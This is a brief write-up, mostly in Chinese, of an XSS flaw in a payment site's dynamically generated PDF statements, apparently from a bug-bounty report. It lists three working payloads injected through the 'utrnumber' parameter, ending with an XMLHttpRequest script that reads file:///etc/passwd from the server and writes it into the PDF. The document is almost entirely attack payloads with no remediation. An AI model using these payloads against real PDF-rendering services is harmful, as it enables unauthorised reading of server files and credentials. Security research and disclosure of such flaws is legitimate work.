Local File read via xss in dynamically genearated pdf

Introduction

本文介绍了如何利用xss读取服务器文件,并将其打印在pdf。

https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date...

utrnumber存在xss injection point.

Payload 1:

在下载的pdf中,发现aaaa.

<p id="test">aaa</p><script>document.getElementById('test').innerHTML+='aa'</script>

Payload 2:

在下载的pdf中,显示了pdf的路径,如file://...

<img src=x onerror="document.write('aaa'%2bwindow.location)">

Payload 3:

既然服务器使用了file://, 于是就尝试读取/etc/passwd.

<script>
	x=new XMLHttpRequest;
	x.onload=function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Ref

Local File read via xss in dynamically genearated pdf

Show Comments